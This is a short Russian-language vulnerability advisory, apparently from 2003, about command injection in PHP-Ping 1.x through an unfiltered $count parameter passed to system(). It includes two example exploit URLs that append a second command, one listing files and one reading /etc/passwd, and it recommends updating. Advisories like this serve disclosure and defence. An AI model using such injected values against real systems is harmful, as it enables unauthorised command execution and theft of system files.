Security Lab

Удаленное выполнение произвольных команд в PHP-Ping

Дата публикации:31.12.2003
Всего просмотров:1433
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP-Ping 1.x
Уязвимые версии: PHP-Ping

Описание: Уязвимость обнаружена в PHP-Ping. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Уязвимость обнаружено в переменной $count, которая вызывает system() без какой либо фильтрации. Удаленный пользователь может представить специально обработанный URL, чтобы выполнить произвольные команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://[target]/php-ping.ph p?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21

URL производителя: http://www.theworldsend.net

Решение:Установите обновленную версию программы.

Ссылки: php-ping: Executing arbritary commands